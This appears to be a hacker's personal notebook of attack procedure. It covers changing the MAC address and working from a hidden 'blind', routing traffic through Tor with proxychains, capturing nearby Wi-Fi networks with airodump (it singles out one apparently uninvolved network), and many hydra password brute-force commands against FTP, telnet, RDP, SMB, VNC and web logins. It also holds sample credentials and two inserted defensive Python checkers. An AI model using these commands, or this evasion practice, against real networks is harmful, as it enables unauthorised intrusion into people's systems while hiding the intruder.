The Process
βεη (ß¿) βεÏÏαΨÿ

This information is exclusively for my own use.
Any violation will be punished to the full extent
of my imagination...

βεη


Frequently Used Commands

List available APs

sudo nmcli dev wifi list

List all local socket connections

sudo netstat -atnp | grep "ESTABLISHED\|LISTEN" | awk '{printf "%-25s %-10s %-25s %-20s\n",$7,$1,$4,$5}' | sed /^-/d | sed 's/\//  /g'

The find command

find /home/username/ -iname "*.err"

The Process

Each of these headings expands into the detail of that procedure. This section represents the majority of the material on this page.

Be sure to exercise many of the principles from 'The Purple Files' in order to stay on task, record important information, and make the engagement productive.

The basic process is to prepare your machine long before you arrive at your blind or run a single command, and for that matter before you even power up. Boot from a removable-media copy of Kali Linux, or the Linux of your choice (do not use persistence). Change your MAC. Go to your blind. Start a pcap log of everything passing through your network interface and save it to a local file. Walk through your methodology, making notes along the way. Include date-time stamps. Consider using a second removable medium to save your working papers and the pcap log file.


Principles and Priorities
  1. Stay out of jail! No, really! Stay out of jail!
  2. Do No Harm!
  3. Be ethical! Always!
  4. Think twice about every atomic step.
  5. Log everything you do so you have a detailed transcription of your actions.

MAC setting

Before you begin, while still outside the WiFi range of the target and of the blind from which you plan to work, change your MAC address to something random but plausible. Try to fit into the herd: if the target is among a bunch of computers of this or that type, use a MAC within that range.

sudo iwconfig
sudo ifconfig
macchanger -s wlan0
sudo ifconfig wlan0 down
sudo macchanger -A wlan0
sudo ifconfig wlan0 up
sudo ifconfig
sudo ifconfig wlan0 down
sudo macchanger -p wlan0
sudo ifconfig
Or
ifconfig
ifconfig enp2s0 down
ifconfig enp2s0 hw ether 00:00:00:00:00:01
ifconfig enp2s0 up

Prep
sudo tcpdump -i wlan0 -B 8192 -s0 -w Date.pcap

-[Disable internal and enable external USB WiFi]-
Normal settings:
  eno1:   55:26:1b:69:43:2a
  wlp2s0: c0:fb:da:7A:de:f3
  wlan0:  00:c0:b0:8f:2a:07

sudo ifconfig wlan0 down
sudo macchanger -A wlan0
sudo ifconfig wlan0 up
sudo ifconfig wlan0 down
sudo macchanger -A wlan0
sudo ifconfig wlan0 up
sudo ifconfig wlan0

Connect to AP

Once you are in range of the blind

sudo iw dev
sudo iw wlan0 link
sudo iw wlan0 scan
sudo nmcli dev wifi
sudo nmcli -f ALL dev wifi
sudo ifconfig wlan0 up
sudo iwlist wlan0 scan
sudo iwlist wlan0 scan | grep ESSID
sudo dhclient wlan0
sudo iwconfig wlan0 essid network-essid
sudo nmcli connection show
sudo iwconfig wlan0 freq 2.422G
sudo wpa_supplicant -c /etc/wpa_supplicant.conf -i wlan0
sudo systemctl stop NetworkManager
sudo dhclient wlan0

Proxy Chains



sudo -i

sudo apt install tor

service tor start

service tor status

service tor start

service tor status

nano /etc/proxychains4.conf

In proxychains4.conf you want to uncomment 'dynamic_chain' and comment out 'strict_chain' and 'random_chain'.

You also want to uncomment 'proxy_dns' (the line under the comment 'Proxy DNS requests - no leak for DNS data').

Then in the [ProxyList] section add the following two lines. All other proxies should be commented out.

socks4  127.0.0.1 9050
socks5  127.0.0.1 9050

Restart your machine and start the tor service.

service tor restart
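A checker for the edits just described, added here as an example and not part of the original notes: it parses proxychains4.conf text, confirms that dynamic_chain is the only active mode and that proxy_dns is on (proxychains only intercepts TCP connections, so without proxy_dns name lookups leave the machine directly), and validates each [ProxyList] entry as a lower-case 'protocol ip port' triple. The two sample configs are constructed.

```python
import ipaddress

CHAIN_MODES = ("dynamic_chain", "strict_chain", "random_chain", "round_robin_chain")
PROTOCOLS = ("http", "socks4", "socks5", "raw")
# Constructed sample with the edits from the notes applied (not a real file).
SAMPLE_GOOD = """\
dynamic_chain
#strict_chain
#random_chain
# Proxy DNS requests - no leak for DNS data
proxy_dns
[ProxyList]
socks4  127.0.0.1 9050
socks5  127.0.0.1 9050
"""
# Same file with proxy_dns still commented out and an upper-case protocol name.
SAMPLE_LEAKY = (SAMPLE_GOOD.replace("\nproxy_dns\n", "\n#proxy_dns\n")
                .replace("socks5  127.0.0.1 9050", "SOCKS5 127.0.0.1 9050"))

def parse_proxychains_conf(text):
    """Return (active options, [ProxyList] entries); '#' starts a comment."""
    options, proxies, in_list = {}, [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower() == "[proxylist]":
            in_list = True
        elif in_list:
            proxies.append(line.split())       # 'proto ip port [user pass]'
        else:
            key, *value = line.split(None, 1)  # bare word or 'key value'
            options[key] = value[0] if value else True
    return options, proxies

def check_proxychains_conf(text):
    """Return a list of findings; empty means the file matches the notes above."""
    options, proxies = parse_proxychains_conf(text)
    findings = []
    modes = [m for m in CHAIN_MODES if m in options]
    if modes != ["dynamic_chain"]:
        findings.append(f"chain mode must be dynamic_chain only, found {modes}")
    if "proxy_dns" not in options:
        findings.append("proxy_dns is commented out: DNS lookups would bypass the chain")
    for entry in proxies:  # expect lower-case 'proto ip port', as the notes say
        try:
            ok = (entry[0] in PROTOCOLS and len(entry) in (3, 5) and 0 < int(entry[2]) < 65536
                  and ipaddress.ip_address(entry[1]) is not None)
        except (IndexError, ValueError):
            ok = False
        if not ok:
            findings.append("bad ProxyList entry: " + " ".join(entry))
    return findings
```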

Now you can start hunting. Note that if you start a browser, be sure to close all of its tabs and terminate it before running other command line tools.

proxychains firefox www.google.com
proxychains nmap ...
proxychains sqlmap ...

You can check your IP to confirm. This is the report from nordvpn.com/what-is-my-ip in Firefox without proxychains.

nordvpn.com/what-is-my-ip
proxychains firefox nordvpn.com/what-is-my-ip

Other sites that report your IP include:

https://whatismyipaddress.com/
https://www.whatismyip.com/
https://www.iplocation.net/find-ip-address
https://www.ipvanish.com/what-is-my-ip-address/

You can also check from the command line.

curl https://ipinfo.io/ip
wget -qO- https://ipecho.net/plain ; echo
curl https://ipecho.net/plain
curl ifconfig.me
curl ipv4.icanhazip.com

Now check using proxychains. Restart tor and you get a new path.

proxychains curl https://ipinfo.io/ip
service tor restart
proxychains curl https://ipinfo.io/ip

More on Proxychains


To test
proxychains curl ifconfig.me/ip

If you get something different from your actual IP, then it is working.

Try capturing your traffic with tcpdump, then analyze it with Wireshark.
Open your web browser with the proxychains command
proxychains firefox

and then go to this web page
https://www.dnsleaktest.com/

If it shows you a different location, it is working. You can also click on the test button to see more details.

Make sure that your DNS server has also changed.

Or,
proxychains firefox www.whatsmyip.org
proxychains firefox www.dnsleaktest.com
proxychains firefox nordvpn.com/what-is-my-ip
proxychains firefox ip.me
proxychains firefox www.whatismypublicip.com
host -4 myip.opendns.com resolver1.opendns.com
proxychains curl ifconfig.me
proxychains curl icanhazip.com
proxychains curl ipecho.net/plain
proxychains curl https://diagnostic.opendns.com/myip
proxychains curl ident.me
proxychains dig TXT +short o-o.myaddr.l.google.com @ns1.google.com | awk -F'"' '{ print $2}'

Harvest selected proxies from the above site and use LibreOffice Calc and Sublime to create a tmp file that contains the proxies in the proxychains format (protocol ip port), all lower case.

Note how to set the configuration file (/etc/proxychains4.conf).

proxychains sudo nmap -sT -p 80 HQ.info
proxychains sudo nmap -sT -PO -p 80 HQ.info
proxychains sudo nmap -sT -PO -p 80 thepurplefiles.com
host thepurplefiles.com
sudo nc.traditional -vv -n 162.241.225.36 80
GET / HTTP/1.0
proxychains nmap -sT -p 80 162.241.225.36
proxychains nmap -sT -p 443 162.241.225.36
host HQ.info

Reconnaissance
nmcli dev wifi list
sudo iwlist wlan0 scan

Enumeration
nmap -Pn -A -sS -sV --open --version-all -T4 -p 1-65535 -oN 127.0.0.2.nmap.full.versions.txt 127.0.0.2
enum4linux -S -u "HQStaff" -p "HQ2014" 10.8.16.3

Exploit

Use the following to research known exploits.

  • searchsploit - Included in our Exploit Database repository on GitLab is searchsploit, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go. SearchSploit gives you the power to perform detailed off-line searches through your locally checked-out copy of the repository. This capability is particularly useful for security assessments on segregated or air-gapped networks without Internet access.

    Many exploits contain links to binary files that are not included in the standard repository but can be found in our Exploit Database Binary Exploits repository instead. If you anticipate you will be without Internet access on an assessment, ensure you check out both repositories for the most complete set of data.

    This guide is for version 4 of SearchSploit. Note, The name of this utility is SearchSploit and as its name indicates, it will search for all exploits and shellcode. It will not include any results for Google Hacking Database, but it can include Papers if configured (correctly!).

    https://gitlab.com/exploit-database/exploitdb
  • /usr/share/seclists/
        README.md
        /Discovery
        /IOCs
        /Fuzzing
        /Miscellaneous
        /Passwords
        /Pattern-Matching
        /Payloads
        /Usernames
        /Web-Shells
  • /usr/share/exploitdb/
        exploits
        files_exploits.csv  
        files_shellcodes.csv  
        /shellcodes
    
    /usr/share/exploitdb-papers/
        /docs  
        files_papers.csv  
        /papers
  • /usr/share/exploitdb-bin-sploits/
        bin-sploits
  • metasploit-framework
  • /home/parth/Hacking/packetstorm.archives
  • /home/parth/Hacking/wordlists

Ben, flesh out the following...

/usr/share/metasploit-framework
sqlmap

aircrack-ng examples
sudo airmon-ng check
sudo airmon-ng check kill
iwconfig
sudo airmon-ng start wlan0
iwconfig
sudo airodump-ng wlan0

 CH 11 ][ Elapsed: 3 mins ][ 2021-05-31 17:24

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C8:52:61:97:05:B0  -32      128       66    0   1  54e  WPA2 CCMP   PSK  ATDFJ7Er3A
 BC:A5:11:99:2E:38  -36      139        0    0   1  54e. WPA2 CCMP   PSK  ATDFJ7Er3A_2GEXT
 DA:31:34:68:77:AF  -42      134       10    0   1  54e  WPA2 CCMP   PSK  DIRECT-roku-619-781E36
 94:8F:CF:75:BE:00  -53      139      118    0   1  54e  WPA2 CCMP   PSK  ATFB2a6B4A
 96:8F:CF:75:BE:02  -54      138        0    0   1  54e  WPA2 CCMP   PSK  <length: 18>
 30:E1:71:B2:B8:66  -70      132        0    0   6  54e  WPA2 CCMP   PSK  DIRECT-65-HP ENVY 4510 series
 B0:EE:7B:AF:1E:E5  -71       89        0    0   6  54e  WPA2 CCMP   PSK  <length: 22>
 1E:49:7B:40:18:AA  -76      133       16    0   6  54e  WPA2 CCMP   PSK  TheFolks
 78:32:1B:6E:8D:D0  -76       32        5    0   2  54e  WPA2 CCMP   PSK  Citizencharlesfosterkane
 1C:49:7B:40:18:A9  -77      138        5    0   6  54e  WPA2 CCMP   PSK  Homestead
 96:8F:CF:1C:94:52  -78       40        0    0   6  54e  WPA2 CCMP   PSK  <length: 18>
 14:91:82:D4:3E:80  -79       12        8    0   1  54e  WPA2 CCMP   PSK  belkin.e80
 2C:99:24:61:7F:D9  -79       79        1    0  11  54e. WPA2 CCMP   PSK  ARRIS-7FDB
 A0:04:60:35:2D:C5  -80      114       11    0   7  54e  WPA2 CCMP   PSK  Serenity
 A2:17:B8:45:0D:63  -76      121       74    0  11  54e  WPA2 CCMP   PSK  <length:  9>
 2C:30:33:E7:45:7D  -82       83      102    3   1  54e  WPA2 CCMP   PSK  belkin.e80_2GEXT
 F4:17:B8:45:0D:62  -75      135       75    0  11  54e  WPA2 CCMP   PSK  ATFB2a6B4A
 94:8F:CF:1C:94:50  -81       41       15    0   6  54e  WPA2 CCMP   PSK  ATTAG2GTA2
 BA:2C:A0:8B:15:63  -82      128        0    0   6  54e  OPN              NewThermostat_8B1563
 14:91:82:D4:3E:83  -80       10        0    0   1  54e  OPN              belkin.e80.guests
 98:F7:81:52:85:65  -81       15        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-57D5
 5A:EF:68:FF:21:E1  -81        8        0    0   5  54e  OPN              Linksys10417-guest
 2C:99:24:2D:4D:B9  -82      115        0    0  11  54e. WPA2 CCMP   PSK  ARRIS-4DBB
 98:F7:81:71:B2:8E  -78        0        1    0   9  54e. WPA2 CCMP   PSK  ARRIS-8261
 44:A5:6E:6E:40:0B  -79        4        0    0   1  54e  WPA2 CCMP   PSK  NETGEAR92
 F4:17:B8:1E:69:1A  -81        9        0    0  11  54e  WPA2 CCMP   PSK  ATTMaSk44I
 AC:3A:7A:0B:C1:1F  -78        4        1    0  11  54e  WPA2 CCMP   PSK  DIRECT-roku-483
 58:EF:68:FF:21:E1  -81        5        0    0   5  54e  WPA2 CCMP   PSK  Linksys10417
 F8:2D:C0:D4:82:50  -81        0        6    0   1  -1   WPA              <length:  0>
 F4:17:B8:1E:6A:3A  -79       46        0    0   1  54e  WPA2 CCMP   PSK  ATTMaSk44I

Select an AP from above and begin monitoring it exclusively.

sudo airodump-ng --bssid 1C:49:7B:40:18:A9 -c 6 -w Homestead.capture.cap wlan0

hydra examples

(ftp, detailed)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -d

(number of tasks - 16 default)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -t 32

(stop when creds found)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -F

(read >= 1 target ips from file)

hydra -L usernames.txt -P passwords.txt -M hosts.txt ftp

(null user and pw combinations)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -d -e nsr

(save output to file)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 ftp -d -e nsr -o result.txt

(attack a specific port)

hydra -L usernames.txt -P passwords.txt 10.8.16.1 telnet -s 8080 -o result.txt

(restart previous attack)

hydra -R

(generate passwords 1 to 8 characters long from numerals, lower and upper case letters)

hydra -L usernames.txt -x 1:8:1aA 10.8.16.1 ftp -o result.txt

Telnet

hydra -L users -P passwords 192.168.56.1 telnet "RT-N56U_3.0.0.4"
# hydra -L usernames.txt -P passwords.txt 192.168.2.62 telnet -V

[DATA] attacking service telnet on port 23 [23][telnet] host: 192.168.56.1
    login: username password: password123 1 of 1 target successfully
    completed, 1 valid password found

rdp

hydra -l admin -p password -t 2 10.8.16.1 rdp

ftp

hydra -L usernames.txt -P passwords.txt 192.168.2.62 ftp -V -f

SMB

hydra -L usernames.txt -P passwords.txt 192.168.2.66 smb -V -f

VNC

hydra -P passwords.txt 192.168.2.62 vnc -V

Web form

Syntax: [url]:[form parameters]:[condition string][:(optional)[:(optional)]

  • Target : http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F
  • Login username : admin (if you aren't sure, brute-force this)
  • Password list : "The location of the dictionary file containing possible passwords."
  • Form parameters : "In general, use Tamper Data or a proxy to obtain the request's form parameters. But here I'm using Iceweasel (Firefox based) with the network developer toolbar."
  • Service module : http-post-form
hydra -l (username) -P (passwords) (hostname) (service-module) (post request parameters)
  • l : is a word containing the username account; use -L (FILE) to refer to a list of possible user names in a file.
  • P (FILE) : is a file listing possible passwords; use -p (password) to literally use one password instead of guessing it.
  • testasp.vulnweb.com : is the hostname or target
  • http-post-form : is the service module we use
  • "/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" = the 3 parameters needed; the syntax is: {page URL}:{request POST body form parameters}:S={string found in the page after successfully logging in}
  • v = Verbose mode
  • V = show login:pass for each attempt
  • f = Terminate program if a login:password pair is found

Finally, based on information we have gathered, our commands should look something like this:

hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form "/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" -vV -f

hydra Remote-IP-Address http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie\:security=low; PHPSESSID=fe4d577c1704ed9d87f3cbe3e4c8d4de" -l admin -P /root/passwords/Passwords -V
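The defender's side of the hydra runs above, added as an example that is not part of the original notes: it reads syslog-style auth.log lines (a constructed sample is embedded; the year is assumed because syslog omits it) and flags any source IP that exceeds a failure threshold inside a sliding window, which hydra's parallel tasks (-t 16 by default) trip within a second or two while a human typing wrong passwords does not.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

THRESHOLD = 5  # failures tolerated per source before alerting
WINDOW = 60    # sliding window in seconds
YEAR = 2021    # assumed: syslog timestamps carry no year

# Two failure shapes: sshd "Failed password" and the pam_unix line that
# vsftpd, login/telnet and other PAM services emit.
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ (?P<svc>[\w.-]+)(?:\[\d+\])?: "
    r"(?:Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+)"
    r"|pam_unix\(\w+:auth\): authentication failure;.* rhost=(?P<ip2>[\d.]+))"
)
# Constructed sample: a seven-failure burst from 10.8.16.5, one slow failure
# from 10.8.16.9 and one successful login that must be ignored.
SAMPLE_LOG = """\
May 31 17:24:01 kali sshd[2201]: Failed password for invalid user admin from 10.8.16.5 port 51234 ssh2
May 31 17:24:01 kali sshd[2202]: Failed password for invalid user admin from 10.8.16.5 port 51236 ssh2
May 31 17:24:02 kali sshd[2203]: Failed password for root from 10.8.16.5 port 51238 ssh2
May 31 17:24:02 kali sshd[2204]: Failed password for root from 10.8.16.5 port 51240 ssh2
May 31 17:24:03 kali sshd[2205]: Failed password for root from 10.8.16.5 port 51242 ssh2
May 31 17:24:03 kali sshd[2206]: Accepted password for ben from 10.8.16.20 port 40000 ssh2
May 31 17:24:03 kali vsftpd[2310]: pam_unix(vsftpd:auth): authentication failure; logname= uid=0 euid=0 tty=ftp ruser=admin rhost=10.8.16.5
May 31 17:24:04 kali sshd[2207]: Failed password for root from 10.8.16.5 port 51244 ssh2
May 31 17:30:00 kali sshd[2300]: Failed password for ben from 10.8.16.9 port 42000 ssh2
"""

def parse_failure(line):
    """Return (timestamp, service, source_ip) for a failed-login line, else None."""
    m = FAIL_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["svc"], m["ip"] or m["ip2"]

def detect_bursts(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {source_ip: time of first alert} for sources exceeding threshold."""
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    alerts = {}
    for line in lines:
        parsed = parse_failure(line)
        if parsed is None:
            continue
        ts, _svc, ip = parsed
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:  # drop failures older than the window
            q.popleft()
        if len(q) > threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts
```

Feed it `sudo tail -f /var/log/auth.log` output line by line to get the same result live; tune THRESHOLD and WINDOW to the service's normal failure rate.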

What to Focus on
Technical Tasks To Do

. Master ifconfig, iwconfig, iw,
. Work through tutorials and book on WireShark
. Pull images and text from wifi
. Use JTR to crack a WiFi (WEP), Linux login, MS login password hash.
. Perform a MITM attack
. Crack a WiFi password
. Crack an online PW with hydra
. Sending signals (SIGTERM, SIGINT...)
. Setup target and walk through several msf actions (along with other tools).

. Master these tools:
arpwatch - Ethernet Activity Monitor.
bmon - bandwidth monitor and rate estimator.
bwm-ng - live network bandwidth monitor.
curl - transferring data with URLs. (or try httpie)
darkstat - captures network traffic, usage statistics.
dhclient - Dynamic Host Configuration Protocol Client
dig - query DNS servers for information.
dstat - replacement for vmstat, iostat, mpstat, netstat and ifstat.
ethtool - utility for controlling network drivers and hardware.
gated - gateway routing daemon.
host - DNS lookup utility.
hping - TCP/IP packet assembler/analyzer.
ibmonitor - shows bandwidth and total data transferred.
ifstat - report network interfaces bandwidth.
iftop - display bandwidth usage.
ip - a command with more features than ifconfig (net-tools).
iperf3 - network bandwidth measurement tool.
iproute2 - collection of utilities for controlling TCP/IP.
iptables - take control of network traffic.
IPTraf - An IP Network Monitor.
iputils - set of small useful utilities for Linux networking.
iw - a new nl80211 based CLI configuration utility for wireless devices.
jwhois (whois) - client for the whois service.
lsof -i - reveal information about your network sockets.
mtr - network diagnostic tool.
net-tools - utilities include: arp, hostname, ifconfig, netstat, rarp, route,
    plipconfig, slattach, mii-tool, iptunnel and ipmaddr.
ncat - improved re-implementation of the venerable netcat.
netcat - networking utility for reading/writing network connections.
nethogs - a small ‘net top’ tool.
Netperf - Network bandwidth Testing.
netsniff-ng - Swiss army knife for daily Linux network plumbing.
netstat - Print network connections, routing tables, statistics, etc.
netwatch - monitoring Network Connections.
ngrep - grep applied to the network layer.
nload - display network usage.
nmap - network discovery and security auditing.
nmcli - a command-line tool for controlling NetworkManager and reporting network status.
nmtui - provides a text interface to configure networking by controlling NetworkManager.
nslookup - query Internet name servers interactively.
ping - send icmp echo_request to network hosts.
route - show / manipulate the IP routing table.
slurm - network load monitor.
snort - Network Intrusion Detection and Prevention System.
smokeping - keeps track of your network latency.
socat - establishes two bidirectional byte streams and transfers data between them.
speedometer - Measure and display the rate of data across a network.
speedtest-cli - test internet bandwidth using speedtest.net
ss - utility to investigate sockets.
tcpdump - command-line packet analyzer.
tcptrack - Displays information about tcp connections on a network interface.
telnet - user interface to the TELNET protocol.
tracepath - very similar function to traceroute.
traceroute - print the route packets trace to network host.
vnStat - network traffic monitor.
websocat - Connection forwarder from/to web sockets to/from usual sockets, in style of socat.
wget - retrieving files using HTTP, HTTPS, FTP and FTPS.
Wireless Tools for Linux - includes iwconfig, iwlist, iwspy, iwpriv and ifrename.

Housekeeping

Depending on the engagement you will have prepared in several possible ways, so you need to tie each of them up at this point.

  • Save working material (files, screen shots, whatever) to removable media.
  • Once beyond the blind, reset the MAC.
sudo ifconfig wlp2s0 down
sudo macchanger -p wlp2s0
sudo ifconfig wlp2s0 up



---[End of File]---